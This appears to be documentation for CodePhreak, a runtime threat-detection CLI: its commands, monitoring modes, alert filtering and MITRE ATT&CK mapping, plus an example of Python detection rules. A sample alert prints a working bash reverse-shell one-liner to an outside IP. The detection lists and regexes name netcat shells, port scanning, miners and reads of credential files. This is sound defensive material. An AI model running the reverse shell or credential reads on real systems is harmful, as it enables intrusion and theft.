Runtime Protection

Premium

Runtime Protection provides real-time threat detection for running workloads. It auto-detects your environment and uses the best available monitoring solution.

Quick Start

# Start runtime protection (auto-detects best mode)
$ codephreak runtime-start

# Check protection status
$ codephreak runtime-status

# View security alerts
$ codephreak runtime-alerts

# Stop protection
$ codephreak runtime-stop

Hybrid Approach

CodePhreak automatically detects your environment and selects the best monitoring solution:

AWS GuardDuty
  • Zero install - uses AWS API
  • Auto-selected when AWS credentials detected

GCP Security Command Center
  • Zero install - uses GCP API
  • Auto-selected when GCP credentials detected

Falco Connector
  • Connects to existing Falco daemon
  • Auto-selected when Falco is running

Lightweight Monitor
  • Works everywhere - no dependencies
  • Universal fallback option

Protection Modes

# Auto-detect (default)
$ codephreak runtime-start

# Force specific mode
$ codephreak runtime-start --mode lightweight
$ codephreak runtime-start --mode guardduty --region us-east-1
$ codephreak runtime-start --mode gcp-scc --project my-project
$ codephreak runtime-start --mode falco

# Run in foreground (for testing)
$ codephreak runtime-start --foreground

Command Options

Command          Description
runtime-start    Start runtime protection monitoring
runtime-stop     Stop runtime protection
runtime-status   Show current protection status
runtime-alerts   View detected security alerts

Viewing Alerts

# View alerts from last 24 hours
$ codephreak runtime-alerts

# Filter by severity
$ codephreak runtime-alerts --severity critical
$ codephreak runtime-alerts --severity high,critical

# View alerts from last 48 hours
$ codephreak runtime-alerts --since 48

# Watch alerts in real-time
$ codephreak runtime-alerts --watch

What It Detects

Reverse Shells

  • nc, ncat, netcat connections
  • bash -i interactive shells
  • Python/Perl/Ruby one-liners
  • Suspicious outbound connections

Reconnaissance

  • nmap, masscan port scanning
  • Internal network probing
  • Service enumeration

Cryptominers

  • xmrig, minerd processes
  • High CPU usage anomalies
  • Mining pool connections

Data Access

  • /etc/passwd, /etc/shadow access
  • SSH key reading
  • Cloud metadata access (IMDS)
  • Docker socket access

Example Alert

$ codephreak runtime-alerts --severity critical

🚨 Critical Alerts (2)

┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
│ CRITICAL: Reverse shell detected                              │
├───────────────────────────────────────────────────────────────┤
│ Time:      2024-01-15T10:23:45Z                               │
│ Process:   /bin/bash                                          │
│ Command:   bash -i >& /dev/tcp/45.33.32.156/4444 0>&1        │
│ User:      www-data                                           │
│ PID:       12847                                              │
│ MITRE:     T1059.004 - Command and Scripting Interpreter      │
│                                                               │
│ Remediation: Terminate process, investigate container         │
└───────────────────────────────────────────────────────────────┘

MITRE ATT&CK Mapping

All alerts are mapped to MITRE ATT&CK techniques for standardized threat classification:

  • T1059 - Command and Scripting Interpreter
  • T1046 - Network Service Discovery
  • T1496 - Resource Hijacking (Cryptomining)
  • T1552 - Unsecured Credentials
  • T1071 - Application Layer Protocol (C2)
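As an added illustration (example code, not CodePhreak's implementation) of how the detection categories above can be expressed as rules tagged with the MITRE techniques listed here, and filtered the way runtime-alerts --severity/--since does; event field names, patterns and severities are assumptions:

```python
# Added example (not CodePhreak's own code): rule-based classification of
# process events into the categories above, tagged with MITRE techniques.
# Field names, rule patterns and severities are assumptions.
import re
from datetime import datetime, timedelta, timezone

# (category, severity, MITRE technique, regex over the command line);
# first match wins, so the most specific patterns come first.
RULES = [
    ("reverse_shell", "critical", "T1059.004", re.compile(r"bash -i|/dev/tcp/")),
    ("reverse_shell", "critical", "T1059",
     re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s|\b(python|perl|ruby)\S*\s+-[ce]\s.*socket")),
    ("recon", "high", "T1046", re.compile(r"\b(nmap|masscan)\b")),
    ("cryptominer", "high", "T1496", re.compile(r"\b(xmrig|minerd)\b")),
    ("data_access", "high", "T1552",
     re.compile(r"/etc/(passwd|shadow)\b|\.ssh/|169\.254\.169\.254|/var/run/docker\.sock")),
]

def classify(cmdline):
    """Return (category, severity, technique), or None for a benign command."""
    for category, severity, technique, pattern in RULES:
        if pattern.search(cmdline):
            return category, severity, technique
    return None

def scan(events, severities=None, since_hours=24, now=None):
    """Mirror `runtime-alerts --severity a,b --since N`: classify each event and
    keep those matching the severity filter and newer than `since_hours`."""
    cutoff = (now or datetime.now(timezone.utc)) - timedelta(hours=since_hours)
    alerts = []
    for ev in events:
        hit = classify(ev["cmdline"])
        if hit is None or ev["time"] < cutoff:
            continue
        category, severity, technique = hit
        if severities and severity not in severities:
            continue
        alerts.append({**ev, "category": category, "severity": severity, "mitre": technique})
    return alerts

# Constructed sample process events, not real telemetry.
NOW = datetime(2024, 1, 15, 12, 0, tzinfo=timezone.utc)
EVENTS = [
    {"time": NOW - timedelta(hours=1), "pid": 12847, "user": "www-data",
     "cmdline": "bash -i >& /dev/tcp/45.33.32.156/4444 0>&1"},
    {"time": NOW - timedelta(hours=2), "pid": 12901, "user": "app", "cmdline": "cat /etc/shadow"},
    {"time": NOW - timedelta(hours=40), "pid": 13002, "user": "root", "cmdline": "nmap 10.0.0.0/24"},
    {"time": NOW - timedelta(hours=3), "pid": 13100, "user": "app", "cmdline": "python3 manage.py runserver"},
]
```

Calling scan(EVENTS, {"critical"}, now=NOW) yields only the reverse-shell event; widening to {"high", "critical"} with since_hours=48 also returns the /etc/shadow read and the 40-hour-old nmap run.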

State Persistence

Runtime state is persisted to ~/.codephreak/runtime_state.json, allowing status to be checked across CLI invocations:

$ codephreak runtime-status

    Runtime Protection Status
┏━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ Property         ┃ Value                       ┃
┡━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│ Status           │ 🟢 Running                  │
│ Mode             │ lightweight                 │
│ Source           │ Lightweight Process Monitor │
│ Started At       │ 2024-01-15T10:00:00         │
│ Platform         │ darwin                      │
│ Recommended Mode │ lightweight                 │
└──────────────────┴─────────────────────────────┘

Prerequisites by Mode

Lightweight (Zero Install)

Works everywhere with no additional setup.

AWS GuardDuty

AWS credentials configured, GuardDuty enabled in account.

GCP Security Command Center

GCP credentials configured, SCC API enabled.

Falco

Falco daemon running with its socket at /var/run/falco/falco.sock.

View Alerts in Dashboard

Runtime alerts are synced to the web dashboard with severity breakdown, MITRE ATT&CK links, and remediation guidance.
